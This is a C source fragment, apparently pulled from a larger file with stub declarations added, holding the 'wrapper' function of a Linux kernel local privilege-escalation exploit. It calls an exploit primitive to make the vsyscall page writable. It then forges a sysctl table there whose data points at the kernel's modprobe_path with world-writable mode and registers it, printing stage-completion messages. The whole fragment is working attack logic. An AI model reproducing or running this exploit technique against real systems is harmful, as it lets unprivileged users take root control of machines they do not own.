
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct ctl_table {char* procname; int mode; int maxlen; void* extra2; void* extra1; void* data; void* proc_handler; } ;


 scalar_t__ MODPROBE_PATH ;
 scalar_t__ PROC_DOSTRING ;
 int REGISTER_SYSCTL_TABLE ;
 int SET_MEMORY_RW ;
 int SYSCTL_NAME ;
 scalar_t__ VSYSCALL ;
 int dprintf (char*) ;
 int exploit (int ,scalar_t__,int ) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 int sleep (int) ;
 int strcpy (char*,int ) ;
 int verify_stage1 ;
 int verify_stage2 ;

void wrapper(void)
{
    struct ctl_table *c;

    dprintf("[.] making vsyscall page writable...\n\n");

    exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);

    dprintf("[~] done, stage 1 completed\n");

    sleep(5);

    dprintf("[.] registering new sysctl...\n\n");

    c = (struct ctl_table *)(VSYSCALL+0x850);

    memset((char *)(VSYSCALL+0x850), '\x00', 1952);

    strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
    memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
    c->procname = (char *)(VSYSCALL+0xf00);
    c->mode = 0666;
    c->proc_handler = (void *)(PROC_DOSTRING);
    c->data = (void *)(MODPROBE_PATH);
    c->maxlen = 256;
    c->extra1 = (void *)(VSYSCALL+0xe00);
    c->extra2 = (void *)(VSYSCALL+0xd00);

    exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);

    dprintf("[~] done, stage 2 completed\n");
}
